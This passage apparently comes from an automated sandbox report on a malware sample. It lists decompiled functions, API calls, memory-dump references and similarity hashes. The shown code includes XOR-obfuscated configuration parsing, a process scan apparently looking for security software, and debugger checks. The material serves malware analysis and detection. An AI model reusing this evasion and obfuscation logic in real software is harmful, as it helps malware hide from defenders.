				_t39 =  *0x2ced2a4; // 0x69b25f44
				if(E02CE6247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2ced238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2ced2a4; // 0x69b25f44
						_t45 = E02CE9403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2ced240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2ced2a4; // 0x69b25f44
						_t46 = E02CE9403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2ced244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2ced2a4; // 0x69b25f44
						_t47 = E02CE9403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2ced248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2ced2a4; // 0x69b25f44
						_t48 = E02CE9403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2ced004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2ced2a4; // 0x69b25f44
						_t49 = E02CE9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2ced02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2ced2a4; // 0x69b25f44
						_t50 = E02CE9403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2ced24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2ced2a4; // 0x69b25f44
								_t51 = E02CE9403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02CEA0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02CE9FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2ced2a4; // 0x69b25f44
								_t52 = E02CE9403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02CEA0FD(0, _t52) != 0) {
								_t121 =  *0x2ced32c; // 0x3ba95b0
								E02CE1128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2ced2a4; // 0x69b25f44
								_t53 = E02CE9403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2ced2a8; // 0xeba5a8
								_t22 = _t54 + 0x2cee252; // 0x616d692f
								 *0x2ced2d4 = _t22;
								goto L60;
							} else {
								_t64 = E02CEA0FD(0, _t53);
								 *0x2ced2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2ced2a4; // 0x69b25f44
										_t56 = E02CE9403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2ced2a8; // 0xeba5a8
										_t23 = _t57 + 0x2cee791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02CEA0FD(0, _t56);
									}
									 *0x2ced340 = _t58;
									HeapFree( *0x2ced238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x02ce7fbe
0x02ce7fc1
0x02ce7fe1
0x02ce7fef
0x02ce7fef
0x02ce7ff4
0x02ce800e
0x02ce8276
0x02ce827d
0x02ce8284
0x02ce8284
0x02ce8014
0x02ce8030
0x02ce8264
0x02ce826e
0x00000000
0x02ce8036
0x02ce8036
0x02ce803b
0x02ce8051
0x02ce803d
0x02ce803d
0x02ce804a
0x02ce804a
0x02ce805b
0x02ce805d
0x02ce8067
0x02ce806c
0x02ce806c
0x02ce8067
0x02ce8073
0x02ce8089
0x02ce8075
0x02ce8075
0x02ce8082
0x02ce8082
0x02ce808d
0x02ce808f
0x02ce8099
0x02ce809e
0x02ce809e
0x02ce8099
0x02ce80a5
0x02ce80bb
0x02ce80a7
0x02ce80a7
0x02ce80b4
0x02ce80b4
0x02ce80bf
0x02ce80c1
0x02ce80cb
0x02ce80d0
0x02ce80d0
0x02ce80cb
0x02ce80d7
0x02ce80ed
0x02ce80d9
0x02ce80d9
0x02ce80e6
0x02ce80e6
0x02ce80f1
0x02ce80f3
0x02ce80fd
0x02ce8102
0x02ce8102
0x02ce80fd
0x02ce8109
0x02ce811f
0x02ce810b
0x02ce810b
0x02ce8118
0x02ce8118
0x02ce8123
0x02ce8125
0x02ce812f
0x02ce8134
0x02ce8134
0x02ce812f
0x02ce813b
0x02ce8151
0x02ce813d
0x02ce813d
0x02ce814a
0x02ce814a
0x02ce8155
0x02ce8168
0x02ce8168
0x00000000
0x02ce8157
0x02ce8157
0x02ce8161
0x00000000
0x02ce8172
0x02ce8172
0x02ce8174
0x02ce818a
0x02ce8176
0x02ce8176
0x02ce8183
0x02ce8183
0x02ce818e
0x02ce8190
0x02ce8193
0x02ce8194
0x02ce819b
0x02ce819d
0x02ce819e
0x02ce819e
0x02ce819b
0x02ce81a5
0x02ce81bb
0x02ce81a7
0x02ce81a7
0x02ce81b4
0x02ce81b4
0x02ce81bf
0x02ce81cd
0x02ce81d7
0x02ce81d7
0x02ce81de
0x02ce81f4
0x02ce81e0
0x02ce81e0
0x02ce81ed
0x02ce81ed
0x02ce81f8
0x02ce820b
0x02ce820b
0x02ce8210
0x02ce8216
0x00000000
0x02ce81fa
0x02ce81fd
0x02ce8202
0x02ce8209
0x02ce821b
0x02ce821d
0x02ce8233
0x02ce821f
0x02ce821f
0x02ce822c
0x02ce822c
0x02ce8237
0x02ce8243
0x02ce8248
0x02ce8248
0x02ce8239
0x02ce823c
0x02ce823c
0x02ce8256
0x02ce825b
0x02ce8261
0x00000000
0x02ce8261
0x00000000
0x02ce8209
0x02ce81f8
0x02ce8161
0x02ce8155

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE8063
StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE8095
StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE80C7
StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE80F9
StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE812B
StrToIntExA.SHLWAPI(00000000,00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008), ref: 02CE815D
HeapFree.KERNEL32(00000000,02CE30F3,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008,?,02CE30F3), ref: 02CE825B
HeapFree.KERNEL32(00000000,?,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005,02CED00C,00000008,?,02CE30F3), ref: 02CE826E

Part of subcall function 02CEA0FD: lstrlen.KERNEL32(69B25F44,00000000,7612D3B0,02CE30F3,02CE8241,00000000,02CE30F3,?,69B25F44,?,02CE30F3,69B25F44,?,02CE30F3,69B25F44,00000005), ref: 02CEA106
Part of subcall function 02CEA0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,02CE30F3), ref: 02CEA129
Part of subcall function 02CEA0FD: memset.NTDLL ref: 02CEA138

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID:
API String ID: 3442150357-0
Opcode ID: e492aefb41f8658ec39ebab9af757fbad3b4e91efc65bcfaeaa5a423f40c824b
Instruction ID: 9b312aa7d2685f4ceb9d0e4aa36b07287b84f0fd6bbcba71612c0d073b5395ac
Opcode Fuzzy Hash: e492aefb41f8658ec39ebab9af757fbad3b4e91efc65bcfaeaa5a423f40c824b
Instruction Fuzzy Hash: 80817074E00205EFCF11EBB4DD84E5B76ADEB886047250F65E407DB224EB35DE419B61

Uniqueness

Uniqueness Score: -1.00%

Function 0036E954, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(05555555,2000000B,0036EC72,00000002,00000000,?,?,?,0036EC72,?,00000000), ref: 0036E9ED
GetLocaleInfoW.KERNEL32(05555555,20001004,0036EC72,00000002,00000000,?,?,?,0036EC72,?,00000000), ref: 0036EA16
GetACP.KERNEL32(?,?,0036EC72,?,00000000), ref: 0036EA2B

Strings

OCP, xrefs: 0036E9A8
ACP, xrefs: 0036E972

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fdf0fd249324e0f7723ecb128a8d9a86fada44d37472a449a53cf755d3706a0b
Instruction ID: 761e0d34e240947b17e7fe1d78af7aa7754a8b6d8a84832e3f507ec80584022d
Opcode Fuzzy Hash: fdf0fd249324e0f7723ecb128a8d9a86fada44d37472a449a53cf755d3706a0b
Instruction Fuzzy Hash: D721C52A700101AADB76CF95C905AABB3EAFF50B54B5BC425E90ADB119F732DD48C350

Uniqueness

Uniqueness Score: -1.00%

Function 0036E1C8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

GetACP.KERNEL32(?,?,?,?,?,?,003631F5,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0036E289
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003631F5,?,?,?,00000055,?,-00000050,?,?), ref: 0036E2B4
_wcschr.LIBVCRUNTIME ref: 0036E348
_wcschr.LIBVCRUNTIME ref: 0036E356
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0036E417

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: db89926b9ffa764cd25245ffaa6c068a54fa80fc339a88a09bfddbafae1273e3
Instruction ID: c43ed32b9295e187852022a44be337e6304d57be00708c3b293a6d2599412016
Opcode Fuzzy Hash: db89926b9ffa764cd25245ffaa6c068a54fa80fc339a88a09bfddbafae1273e3
Instruction Fuzzy Hash: 63711979A00305AAD727BB75CC46BAA73ACEF45740F25C429F505DB289EB70E9488760

Uniqueness

Uniqueness Score: -1.00%

Function 0036EB29, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

Part of subcall function 00366300: _free.LIBCMT ref: 00366362
Part of subcall function 00366300: _free.LIBCMT ref: 00366398

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0036EC35
IsValidCodePage.KERNEL32(00000000), ref: 0036EC7E
IsValidLocale.KERNEL32(?,00000001), ref: 0036EC8D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0036ECD5
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0036ECF4

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 3abdaca2f83847581d333e490c0a087147e98f310b96f29a96554e0bc7a85618
Instruction ID: a07be8ab97dc8d4a28487d7a1b0048eac9fe8f7c97100f06c6f1c707c1a0e88a
Opcode Fuzzy Hash: 3abdaca2f83847581d333e490c0a087147e98f310b96f29a96554e0bc7a85618
Instruction Fuzzy Hash: 9951B17AA00216EFDF12DFA5DC41ABE77B8FF05700F198429E915EB194EB709948CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02CE8F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2ced2a8; // 0xeba5a8
						_t2 = _t9 + 0x2ceee34; // 0x73617661
						_push( &_v264);
						if( *0x2ced0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02ce8f26
0x02ce8f30
0x02ce8f34
0x02ce8f3e
0x02ce8f6f
0x02ce8f45
0x02ce8f4a
0x02ce8f57
0x02ce8f60
0x02ce8f77
0x02ce8f62
0x02ce8f6a
0x00000000
0x02ce8f6a
0x02ce8f78
0x02ce8f79
0x00000000
0x02ce8f79
0x00000000
0x02ce8f73
0x02ce8f7f
0x02ce8f84

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CE8F2B
Process32First.KERNEL32(00000000,?), ref: 02CE8F3E
Process32Next.KERNEL32(00000000,?), ref: 02CE8F6A
CloseHandle.KERNEL32(00000000), ref: 02CE8F79

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5898d56189de4055a7a85ec5368a68ed94eec08451bd21173ad79afcde644850
Instruction ID: 88e4502a924ea8e14b4e4d7b6fd200c7e2601b4b7770e70ccb66307028f88e55
Opcode Fuzzy Hash: 5898d56189de4055a7a85ec5368a68ed94eec08451bd21173ad79afcde644850
Instruction Fuzzy Hash: BAF0BB31501264ABDF20B6668C49EEBB66EDBC5710F010351E917D7010E731CB55CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 001A1752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A1752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x1a30f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1a30fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1a30ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x1a30e8 = _t5;
						 *0x1a30f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x1a30e4 = _t6;
						if(_t6 == 0) {
							 *0x1a30e4 =  *0x1a30e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x001a1753
0x001a1761
0x001a1767
0x001a176e
0x001a17c5
0x001a17c5
0x001a1770
0x001a1778
0x001a1785
0x001a1785
0x001a17c1
0x001a17c3
0x00000000
0x00000000
0x00000000
0x001a177a
0x001a1781
0x001a1787
0x001a1787
0x001a178c
0x001a179a
0x001a179f
0x001a17a5
0x001a17ab
0x001a17b2
0x001a17b4
0x001a17b4
0x001a17be
0x001a1783
0x001a1783
0x00000000
0x001a1783
0x001a1781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,001A19AC), ref: 001A1761
GetVersion.KERNEL32 ref: 001A1770
GetCurrentProcessId.KERNEL32 ref: 001A178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001A17A5

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 6dec688bf4a0b94c77ce744982f2fef808516d87886172c62d8d004bda5495fc
Instruction ID: 6b147675f6933898035132b7c71d4fabb2c775ea6f1614100e636da94203563c
Opcode Fuzzy Hash: 6dec688bf4a0b94c77ce744982f2fef808516d87886172c62d8d004bda5495fc
Instruction Fuzzy Hash: EEF06274644311AFD7219FA8BE06B957BA5B707711F204116FA22C69E0E7B189C1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00347C2C, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00347D4C,0047166C), ref: 00347C31
UnhandledExceptionFilter.KERNEL32(00347D4C,?,00347D4C,0047166C), ref: 00347C3A
GetCurrentProcess.KERNEL32(C0000409,?,00347D4C,0047166C), ref: 00347C45
TerminateProcess.KERNEL32(00000000,?,00347D4C,0047166C), ref: 00347C4C

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 821d6a75ffa707ca5b2ba68f4f3a186595e0a46b668a13a1d5ce58d5ea192c59
Instruction ID: 77b9d87e155d6925a5d0cf227b7f1c0641a99acba1be90a53ebfa0ff1df91a9a
Opcode Fuzzy Hash: 821d6a75ffa707ca5b2ba68f4f3a186595e0a46b668a13a1d5ce58d5ea192c59
Instruction Fuzzy Hash: D7D01232000208BBDB022BE0FE1CA29BF2CFB08B02F044006F30E82030DB3388208B65

Uniqueness

Uniqueness Score: -1.00%

Function 6DA67D41, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6DA67E61,6DBF6F68), ref: 6DA67D46
UnhandledExceptionFilter.KERNEL32(6DA67E61,?,6DA67E61,6DBF6F68), ref: 6DA67D4F
GetCurrentProcess.KERNEL32(C0000409,?,6DA67E61,6DBF6F68), ref: 6DA67D5A
TerminateProcess.KERNEL32(00000000,?,6DA67E61,6DBF6F68), ref: 6DA67D61

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: a13c59f1473dc3f2bf13c56034d62f8335453c3f52bfd121990e1977e513059a
Instruction ID: 368115415953f518c5a55d1b3d5465ae5b909675b78322559317f53ec6b3d0e4
Opcode Fuzzy Hash: a13c59f1473dc3f2bf13c56034d62f8335453c3f52bfd121990e1977e513059a
Instruction Fuzzy Hash: 0ED01272000208AFDF012BE1C90CB6D3FB8FB0E247F024400F70B8B049CBB156408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00359C76, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00359D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00359D78
UnhandledExceptionFilter.KERNEL32(00348A1A,?,?,?,?,?,?), ref: 00359D85

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6dd69eb081198e617f1e6227c472459bb9f7edd3644cd59fc5914213d9fa370c
Instruction ID: c30e1570543be81fb3713b5847d9db6f4fd7076d66ad4aac7a2c42c6a5783ff2
Opcode Fuzzy Hash: 6dd69eb081198e617f1e6227c472459bb9f7edd3644cd59fc5914213d9fa370c
Instruction Fuzzy Hash: 9E31B77491121CABCB61DF65D98978CB7F8BF08310F5045DAE80CAB250E7709F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 6DA76FED, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6DA770E5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6DA770EF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6DA770FC

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ee9cf05426f35d8d2a7de62223a0313960ed3b4e98d7c1c7f730c4af6e6a71c3
Instruction ID: 9033e163492cf9f4067e7916fc1b93020756a4e0e06e7b2a62f0bfbdc75ae64b
Opcode Fuzzy Hash: ee9cf05426f35d8d2a7de62223a0313960ed3b4e98d7c1c7f730c4af6e6a71c3
Instruction Fuzzy Hash: 2231D2B49052299BCB21DF24C98879CBBF8FF08314F5046EAE51CA7290E7709BC18F54

Uniqueness

Uniqueness Score: -1.00%

Function 00355B18, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00355B17,?,00000000,?,?,?,0036A292), ref: 00355B3A
TerminateProcess.KERNEL32(00000000,?,00355B17,?,00000000,?,?,?,0036A292), ref: 00355B41
ExitProcess.KERNEL32 ref: 00355B53

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cf6cacc0c003677ad05f3d2617a6d7ecd1b00bf31fe3bee9f7b5bbcd19641a7c
Instruction ID: 538b8e4545440c0b1c90f15c170dff92f9f01c443874686cf0a2ed5226f6f994
Opcode Fuzzy Hash: cf6cacc0c003677ad05f3d2617a6d7ecd1b00bf31fe3bee9f7b5bbcd19641a7c
Instruction Fuzzy Hash: 03E09231000548EBCB236B54EA1DE59BB69EB44742F014415F9098A631DB36ED56CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00202090, Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000048,004D8488,?,00000000,?,?,?,?,00000000), ref: 002020C1
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 002020C8

Part of subcall function 001C4DC0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C4E7E

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Heap$AllocateCreateEventProcess
String ID:
API String ID: 2620780876-0
Opcode ID: 1f85fa2ca52df7a9f57823feaf2e29c441b06cf3367cf1df7685056930036468
Instruction ID: 665ce1625bc4c1f8698a40b279335d37ac0fba0526e2fc2fc1430b70188bf930
Opcode Fuzzy Hash: 1f85fa2ca52df7a9f57823feaf2e29c441b06cf3367cf1df7685056930036468
Instruction Fuzzy Hash: 82118CB1901715EFD720DF99D945B5AFBF8FB08B10F004A2EE519D3780D7B5A8048B90

Uniqueness

Uniqueness Score: -1.00%

Function 02CEB1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CEB1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2ced2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
